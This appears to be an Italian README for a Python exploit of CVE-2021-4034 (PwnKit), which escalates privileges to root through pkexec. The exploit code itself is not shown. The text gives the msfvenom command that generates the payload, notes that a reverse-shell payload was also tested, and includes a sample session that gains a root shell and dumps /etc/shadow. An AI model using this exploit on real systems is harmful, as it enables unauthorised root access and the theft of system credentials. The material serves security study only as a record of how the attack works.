
Exploit Python per CVE-2021-4034 (PwnKit) che eleva i privilegi a root tramite pkexec, generando una shell root con payload msfvenom.
Python3 code per sfruttare CVE-2021-4034 (PWNKIT). Questo è stato un esercizio per "posso farlo funzionare in Python?", e non è pensato come un exploit robusto. Funziona per me, ci sono probabilmente bug.
Il payload predefinito avvia una shell come root, generato da msfvenom:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
Ho testato anche linux/x64/shell_reverse_tcp. Assicurati di includere
l'argomento PrependSetuid=true a msfvenom, altrimenti otterrai solo
una shell come utente e non come root.
Il codice è preso da blasty, l'originale è disponibile qui
$ python CVE-2021-4034.py
[+] Creazione della libreria condivisa per il codice dell'exploit.
[+] Chiamata a execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#